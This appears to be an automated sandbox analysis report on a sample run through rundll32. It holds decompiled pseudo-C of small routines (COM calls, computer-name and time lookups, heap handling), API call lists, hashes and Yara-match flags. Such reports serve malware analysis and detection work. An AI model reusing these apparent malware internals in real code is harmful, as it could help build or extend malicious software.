                            0x04a1209a
                            0x04a1209a
                            0x04a120a7
                            0x04a120ab
                            0x04a120b0
                            0x04a120b6
                            0x04a120bb
                            0x04a120c5
                            0x04a120c7
                            0x04a120cd
                            0x04a120cd
                            0x04a120d0
                            0x04a120d6
                            0x00000000
                            0x00000000
                            0x00000000
                            0x04a1205a
                            0x00000000
                            0x04a1205c
                            0x04a1205c
                            0x04a1205d
                            0x00000000
                            0x04a12062
                            0x04a11ffe
                            0x04a11ffc
                            0x04a11ff3
                            0x04a120d9
                            0x04a120d9
                            0x04a120df
                            0x04a120df
                            0x04a120e8

                            APIs
                            • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,055389D0,04A13F35,?,?,?,?,?,?,?,?,?,?,?,04A13F35), ref: 04A12047
                            • IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,055389D0,04A13F35,?,?,?,?,?,?,?,04A13F35,00000000,00000000,00000000,006D0063), ref: 04A12085
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: QueryServiceUnknown_
                            • String ID:
                            • API String ID: 2042360610-0
                            • Opcode ID: 7e407b33dcca045724fc5a88acb18baaa3a4b952e9d4be2e61b639d6503f646c
                            • Instruction ID: 5d111fe86fbe6fdf14da50f66308a834ce1d7600a890bfbef3b4d886e901f501
                            • Opcode Fuzzy Hash: 7e407b33dcca045724fc5a88acb18baaa3a4b952e9d4be2e61b639d6503f646c
                            • Instruction Fuzzy Hash: 5E510276900619AFDB00DFE4C884EEEB7B9FF48710B058599E905EB260D731ED45CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A146CB Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                            Download Yara Rule
                            C-Code - Quality: 75%
                            			E04A146CB(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E04A174FE(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x4a1a348; // 0xb1d5a8
						_t20 = _t68 + 0x4a1b1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E04A165D1(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}





















                            0x04a146d1
                            0x04a146d4
                            0x04a146e4
                            0x04a146ed
                            0x04a146f1
                            0x04a147bf
                            0x04a147c5
                            0x04a147c5
                            0x04a1470b
                            0x04a14710
                            0x04a14714
                            0x04a1471a
                            0x04a1471f
                            0x04a14726
                            0x04a14735
                            0x04a14735
                            0x04a14739
                            0x04a1473b
                            0x04a14747
                            0x04a14752
                            0x04a1475d
                            0x04a14761
                            0x04a1476b
                            0x04a1476f
                            0x04a14771
                            0x04a14776
                            0x04a1477d
                            0x04a1478d
                            0x04a1478d
                            0x04a14776
                            0x04a1476f
                            0x04a1478f
                            0x04a14794
                            0x04a14799
                            0x04a14799
                            0x04a1479c
                            0x04a147a5
                            0x04a147aa
                            0x04a147aa
                            0x04a147af
                            0x04a147b4
                            0x04a147b4
                            0x04a147af
                            0x04a14739
                            0x04a147b6
                            0x04a147bc
                            0x00000000

                            APIs
                              • Part of subcall function 04A174FE: SysAllocString.OLEAUT32(80000002), ref: 04A1755B
                              • Part of subcall function 04A174FE: SysFreeString.OLEAUT32(00000000), ref: 04A175C1
                            • SysFreeString.OLEAUT32(?), ref: 04A147AA
                            • SysFreeString.OLEAUT32(04A13520), ref: 04A147B4
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: String$Free$Alloc
                            • String ID:
                            • API String ID: 986138563-0
                            • Opcode ID: c2b27cd6cc8f2f00a7209514b5b4ccdca0365f08a40304c0f7d07e8cecab5569
                            • Instruction ID: 57702a55c324fc48ae33c9bac9419260371cc0ce8f3be8a39c701a722701f5b0
                            • Opcode Fuzzy Hash: c2b27cd6cc8f2f00a7209514b5b4ccdca0365f08a40304c0f7d07e8cecab5569
                            • Instruction Fuzzy Hash: 49315CB5500119AFCB21DFA8C988C9BBBBAFFCE7507244658F9059B220D731ED51CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A15634 Relevance: 3.1, APIs: 2, Instructions: 62COMMON
                            Download Yara Rule
                            C-Code - Quality: 50%
                            			E04A15634(intOrPtr* __eax, intOrPtr _a4) {
				void* _v8;
				void* _v12;
				void* _v16;
				intOrPtr* _t22;
				void* _t23;
				intOrPtr* _t24;
				intOrPtr* _t26;
				intOrPtr* _t28;
				intOrPtr* _t30;
				void* _t31;
				intOrPtr* _t32;
				intOrPtr _t42;
				intOrPtr _t45;
				intOrPtr _t48;
				void* _t51;

				_push( &_v16);
				_t42 =  *0x4a1a348; // 0xb1d5a8
				_t2 = _t42 + 0x4a1b468; // 0x20400
				_push(0);
				_push(__eax);
				_t51 =  *((intOrPtr*)( *__eax + 0x3c))();
				if(_t51 >= 0) {
					_t22 = _v16;
					_t45 =  *0x4a1a348; // 0xb1d5a8
					_t6 = _t45 + 0x4a1b488; // 0xe7a1af80
					_t23 =  *((intOrPtr*)( *_t22))(_t22, _t6,  &_v12); // executed
					_t51 = _t23;
					if(_t51 >= 0) {
						_t26 = _v12;
						_t51 =  *((intOrPtr*)( *_t26 + 0x1c))(_t26,  &_v8);
						if(_t51 >= 0) {
							_t48 =  *0x4a1a348; // 0xb1d5a8
							_t30 = _v8;
							_t12 = _t48 + 0x4a1b478; // 0xa4c6892c
							_t31 =  *((intOrPtr*)( *_t30))(_t30, _t12, _a4); // executed
							_t51 = _t31;
							_t32 = _v8;
							 *((intOrPtr*)( *_t32 + 8))(_t32);
						}
						_t28 = _v12;
						 *((intOrPtr*)( *_t28 + 8))(_t28);
					}
					_t24 = _v16;
					 *((intOrPtr*)( *_t24 + 8))(_t24);
				}
				return _t51;
			}


















                            0x04a15640
                            0x04a15641
                            0x04a15647
                            0x04a1564e
                            0x04a15650
                            0x04a15654
                            0x04a15658
                            0x04a1565a
                            0x04a15663
                            0x04a15669
                            0x04a15671
                            0x04a15673
                            0x04a15677
                            0x04a15679
                            0x04a15686
                            0x04a1568a
                            0x04a1568f
                            0x04a15695
                            0x04a1569a
                            0x04a156a2
                            0x04a156a4
                            0x04a156a6
                            0x04a156ac
                            0x04a156ac
                            0x04a156af
                            0x04a156b5
                            0x04a156b5
                            0x04a156b8
                            0x04a156be
                            0x04a156be
                            0x04a156c5

                            APIs
                            • IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 04A15671
                            • IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 04A156A2
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Interface_ProxyQueryUnknown_
                            • String ID:
                            • API String ID: 2522245112-0
                            • Opcode ID: 35c286f45087a5475a53c1236580c75b2ed86653bfdb3075508146f28feab54f
                            • Instruction ID: bfa78dfbf2f9c41ca44f12fbd6d256df0367c78d204209aa0c6b37588bc5f958
                            • Opcode Fuzzy Hash: 35c286f45087a5475a53c1236580c75b2ed86653bfdb3075508146f28feab54f
                            • Instruction Fuzzy Hash: 4D211F79A01619EFDB00DFA4C888D9AB779EFC9714B148684E915DB324D631ED41CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F73223 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • EnumProcessModules.PSAPI(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000,?), ref: 04F73253
                            • GetLastError.KERNEL32(00000008,00000000,00001000,00000000,00001000,00000000,00000104,00000000), ref: 04F7329A
                              • Part of subcall function 04F7E803: RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateEnumErrorFreeLastModulesProcess
                            • String ID:
                            • API String ID: 552344955-0
                            • Opcode ID: 47ab430de0c7cba5968f121853327274be1f06cd50d4adb925162af0b855f288
                            • Instruction ID: bd34eb8f2ffd3eefedd057102bba532970ebae65b4d2ffaf1efa8441a46f771a
                            • Opcode Fuzzy Hash: 47ab430de0c7cba5968f121853327274be1f06cd50d4adb925162af0b855f288
                            • Instruction Fuzzy Hash: 3F116971D00209BBDB11DFA9CC54F9EBBB8EF45754F20405AE90097250E778EA07DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F79370 Relevance: 3.1, APIs: 2, Instructions: 54memorytimeCOMMON
                            Download Yara Rule
                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,04F702F2,69B25F44,?,?,00000000), ref: 04F793AD
                            • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,04F702F2), ref: 04F7940E
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Time$FileFreeHeapSystem
                            • String ID:
                            • API String ID: 892271797-0
                            • Opcode ID: 7ae723e30f24f3612327898f76864d271fb8a2c0dff8e47146f685c27697339e
                            • Instruction ID: 28167de8e5d5e4edc373f8502d1ae83da3a9cc16fa1525d90f1ac835202d9fe3
                            • Opcode Fuzzy Hash: 7ae723e30f24f3612327898f76864d271fb8a2c0dff8e47146f685c27697339e
                            • Instruction Fuzzy Hash: 7211DAB5D0010CFBEB11DBA4E944EAE77BCEB08305F1040ABE901EA150D778AB45DB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A11240 Relevance: 3.1, APIs: 2, Instructions: 52COMMON
                            Download Yara Rule
                            APIs
                            • SafeArrayCreate.OLEAUT32(00000011,00000001,80000002), ref: 04A11267
                              • Part of subcall function 04A146CB: SysFreeString.OLEAUT32(?), ref: 04A147AA
                            • SafeArrayDestroy.OLEAUT32(?), ref: 04A112B7
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: ArraySafe$CreateDestroyFreeString
                            • String ID:
                            • API String ID: 3098518882-0
                            • Opcode ID: fdd4fbc577f703f85a454ef363a4a506cc05654b0adaa745f51119738b9ee0f9
                            • Instruction ID: 3a0cac210b7ec955e5d50488130e5b0cca0c9e628d59aee4ff1cc0df069fecca
                            • Opcode Fuzzy Hash: fdd4fbc577f703f85a454ef363a4a506cc05654b0adaa745f51119738b9ee0f9
                            • Instruction Fuzzy Hash: 27111E75A00209BFEB01DFA8D904EEEB7B9EF18750F018025EA04E7170E775AA15DBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A141FA Relevance: 3.0, APIs: 2, Instructions: 50memorytimeCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A141FA(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				struct _FILETIME _v12;
				signed int _t11;
				void* _t16;
				short _t19;
				void* _t22;
				void* _t24;
				void* _t25;
				short* _t26;

				_t24 = __edx;
				_t25 = E04A161FC(_t11, _a12);
				if(_t25 == 0) {
					_t22 = 8;
				} else {
					_t26 = _t25 + _a16 * 2;
					 *_t26 = 0; // executed
					_t16 = E04A12AE4(__ecx, _a4, _a8, _t25); // executed
					_t22 = _t16;
					if(_t22 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						_t19 = 0x5f;
						 *_t26 = _t19;
						_t22 = E04A14822(_t24, _a4, 0x80000001, _a8, _t25,  &_v12, 8);
					}
					HeapFree( *0x4a1a2d8, 0, _t25);
				}
				return _t22;
			}











                            0x04a141fa
                            0x04a1420b
                            0x04a1420f
                            0x04a1426a
                            0x04a14211
                            0x04a14218
                            0x04a14220
                            0x04a14223
                            0x04a14228
                            0x04a1422c
                            0x04a14232
                            0x04a1423a
                            0x04a1423d
                            0x04a14255
                            0x04a14255
                            0x04a14260
                            0x04a14260
                            0x04a14271

                            APIs
                              • Part of subcall function 04A161FC: lstrlen.KERNEL32(?,00000000,05539D70,00000000,04A139E8,05539F93,69B25F44,?,?,?,?,69B25F44,00000005,04A1A00C,4D283A53,?), ref: 04A16203
                              • Part of subcall function 04A161FC: mbstowcs.NTDLL ref: 04A1622C
                              • Part of subcall function 04A161FC: memset.NTDLL ref: 04A1623E
                            • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,761B5520,00000008,00000014,004F0053,055393F4), ref: 04A14232
                            • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,761B5520,00000008,00000014,004F0053,055393F4), ref: 04A14260
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                            • String ID:
                            • API String ID: 1500278894-0
                            • Opcode ID: 76aed9e7e0a080b70ff86219a44ba6af8e1e32629b43e6fcf82d63e20cb57db5
                            • Instruction ID: 94154fd5047ece6aa76563b6c01b32f07ecdf0fc916ce10b6d738d0c581b1e12
                            • Opcode Fuzzy Hash: 76aed9e7e0a080b70ff86219a44ba6af8e1e32629b43e6fcf82d63e20cb57db5
                            • Instruction Fuzzy Hash: 94018F32200249BBEB215FA8DC44E9B3B7DFF88714F00002AFA009A170DBB1E955D750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A114F1 Relevance: 3.0, APIs: 2, Instructions: 43memoryCOMMON
                            Download Yara Rule
                            APIs
                            • SysAllocString.OLEAUT32(04A17283), ref: 04A1150A
                              • Part of subcall function 04A146CB: SysFreeString.OLEAUT32(?), ref: 04A147AA
                            • SysFreeString.OLEAUT32(00000000), ref: 04A1154B
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: String$Free$Alloc
                            • String ID:
                            • API String ID: 986138563-0
                            • Opcode ID: b0f61ebe1c3508d71731a140e0076f1f846cca444fed7f8073f220b892e5ddda
                            • Instruction ID: 135763e027bddc10f9902a90cee74a76f3c341a49c8e374cbddee5741c55eddb
                            • Opcode Fuzzy Hash: b0f61ebe1c3508d71731a140e0076f1f846cca444fed7f8073f220b892e5ddda
                            • Instruction Fuzzy Hash: 46014B7650010ABFEF419FA8D904DEF7BB8EF4C754B044022FA09E6130E630AE15DBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A122D7 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                            Download Yara Rule
                            C-Code - Quality: 37%
                            			E04A122D7(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E04A16D63(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E04A16C2C(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}









                            0x04a122dc
                            0x04a122e7
                            0x04a122e9
                            0x04a122ef
                            0x04a122f1
                            0x04a122f6
                            0x04a122ff
                            0x04a12303
                            0x04a1230c
                            0x04a12310
                            0x04a1231f
                            0x04a12312
                            0x04a12313
                            0x04a12318
                            0x04a12318
                            0x04a12310
                            0x04a12303
                            0x04a12328

                            APIs
                            • GetComputerNameExA.KERNEL32(00000003,00000000,04A157B5,00000000,00000000,?,746BC740,04A157B5), ref: 04A122EF
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • GetComputerNameExA.KERNEL32(00000003,00000000,04A157B5,04A157B6,?,746BC740,04A157B5), ref: 04A1230C
                              • Part of subcall function 04A16C2C: RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: ComputerHeapName$AllocateFree
                            • String ID:
                            • API String ID: 187446995-0
                            • Opcode ID: f2540a512119e952d8cac916d081f6754a4b2dda5bfb1ce49e4578a2c5caf98d
                            • Instruction ID: 638897180682c49dc18c97d9468e3428d88e9896c20c4212e4af3bbf2c38a1fb
                            • Opcode Fuzzy Hash: f2540a512119e952d8cac916d081f6754a4b2dda5bfb1ce49e4578a2c5caf98d
                            • Instruction Fuzzy Hash: FEF05477A00105BBEB21D7A98D00FEF76FCDBC5650F1100A9E954E3150EAB0EE019772
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04A178BF Relevance: 3.0, APIs: 2, Instructions: 35stringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E04A178BF(WCHAR* _a4) {
				void* __edi;
				intOrPtr _t11;
				intOrPtr _t14;
				void* _t16;
				void* _t18;
				WCHAR* _t20;

				_t20 = E04A16D63(lstrlenW(_a4) + _t7 + 0x5c);
				if(_t20 == 0) {
					_t18 = 8;
				} else {
					_t11 =  *0x4a1a348; // 0xb1d5a8
					_t5 = _t11 + 0x4a1ba70; // 0x43002f
					wsprintfW(_t20, _t5, 5, _a4);
					_t14 =  *0x4a1a348; // 0xb1d5a8
					_t6 = _t14 + 0x4a1b900; // 0x6d0063
					_t16 = E04A17928(0, _t6, _t20, 0); // executed
					_t18 = _t16;
					E04A16C2C(_t20);
				}
				return _t18;
			}









                            0x04a178d5
                            0x04a178d9
                            0x04a17919
                            0x04a178db
                            0x04a178df
                            0x04a178e6
                            0x04a178ee
                            0x04a178f4
                            0x04a178ff
                            0x04a17908
                            0x04a1790e
                            0x04a17910
                            0x04a17910
                            0x04a1791e

                            APIs
                            • lstrlenW.KERNEL32(7620F710,00000000,?,04A171A6,00000000,?,7620F710,00000000,7620F730), ref: 04A178C5
                              • Part of subcall function 04A16D63: RtlAllocateHeap.NTDLL(00000000,00000000,04A15D7B), ref: 04A16D6F
                            • wsprintfW.USER32 ref: 04A178EE
                              • Part of subcall function 04A17928: memset.NTDLL ref: 04A1794B
                              • Part of subcall function 04A17928: GetLastError.KERNEL32 ref: 04A17997
                              • Part of subcall function 04A16C2C: RtlFreeHeap.NTDLL(00000000,00000000,04A15E1D,00000000,?,?,00000000), ref: 04A16C38
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmpDownload File
                            • Associated: 00000002.00000002.454014054.0000000004A1C000.00000002.10000000.00040000.00000000.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4a10000_rundll32.jbxd
                            Similarity
                            • API ID: Heap$AllocateErrorFreeLastlstrlenmemsetwsprintf
                            • String ID:
                            • API String ID: 1672627171-0
                            • Opcode ID: ffe8627896971dfbc541f18d3431eef544aaa1220e711bf4b67482b0e693ab6d
                            • Instruction ID: 2a16bd918018d02c27feb333bb01e1201c5857b808638cef5a3ce056ce8b6db3
                            • Opcode Fuzzy Hash: ffe8627896971dfbc541f18d3431eef544aaa1220e711bf4b67482b0e693ab6d
                            • Instruction Fuzzy Hash: E5F0B43A602614ABE7119B64DC04F9B37DCEF94725F058412F944C7131D634ED16C765
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F7E869 Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                            Download Yara Rule
                            APIs
                            • RtlEnterCriticalSection.NTDLL(04F8A400), ref: 04F7E873
                            • RtlLeaveCriticalSection.NTDLL(04F8A400), ref: 04F7E8AF
                              • Part of subcall function 04F61A0A: lstrlen.KERNEL32(?,?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000,?,00000000,04F80977,04F7893A,?,?), ref: 04F61A58
                              • Part of subcall function 04F61A0A: VirtualProtect.KERNEL32(00000000,00000000,00000040,-0000001C,?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000,?,00000000,04F80977), ref: 04F61A6A
                              • Part of subcall function 04F61A0A: lstrcpy.KERNEL32(00000000,?), ref: 04F61A79
                              • Part of subcall function 04F61A0A: VirtualProtect.KERNEL32(00000000,00000000,?,-0000001C,?,00000000,?,04F819C5,04F894D8,?,?,00000004,00000000,?,00000000,04F80977), ref: 04F61A8A
                              • Part of subcall function 04F7E803: RtlFreeHeap.NTDLL(00000000,?,04F73953,?,?,04F7BF5B,00000000,00000000,04F610B0,00000000,04F89F2C,00000008,00000003), ref: 04F7E80F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalProtectSectionVirtual$EnterFreeHeapLeavelstrcpylstrlen
                            • String ID:
                            • API String ID: 1872894792-0
                            • Opcode ID: c4f7c961554bc99835c0e3cf7ead30ee02269ba092af75cb70675e52c49e8b06
                            • Instruction ID: fe77de0278ad81d54a80578d271ae253f15377e45e62c35322d79c09ff53f567
                            • Opcode Fuzzy Hash: c4f7c961554bc99835c0e3cf7ead30ee02269ba092af75cb70675e52c49e8b06
                            • Instruction Fuzzy Hash: C8F0EC35A012169FCB207F18E888C75F758EB8511A311419FED165B310C66EBC53C6D0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 04F6C9A9 Relevance: 3.0, APIs: 2, Instructions: 27COMMON
                            Download Yara Rule
                            APIs
                            • InterlockedIncrement.KERNEL32(04F8A05C), ref: 04F6C9BE
                              • Part of subcall function 04F72331: GetSystemTimeAsFileTime.KERNEL32(?), ref: 04F7235C
                              • Part of subcall function 04F72331: HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 04F72369
                              • Part of subcall function 04F72331: NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 04F723F5
                              • Part of subcall function 04F72331: GetModuleHandleA.KERNEL32(00000000), ref: 04F72400
                              • Part of subcall function 04F72331: RtlImageNtHeader.NTDLL(00000000), ref: 04F72409
                              • Part of subcall function 04F72331: RtlExitUserThread.NTDLL(00000000), ref: 04F7241E
                            • InterlockedDecrement.KERNEL32(04F8A05C), ref: 04F6C9E2
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: InterlockedThreadTime$CreateDecrementExitFileHandleHeaderHeapImageIncrementInformationModuleQuerySystemUser
                            • String ID:
                            • API String ID: 1011034841-0
                            • Opcode ID: f927db48d7c7adf8b95b6c8233aa2ae552b32cb156b4c977c9ed4f825a005a6f
                            • Instruction ID: b871515374fba071c097457fc8d1957eb9e58bfdff6f9b9fc2a4b0adc59abb2a
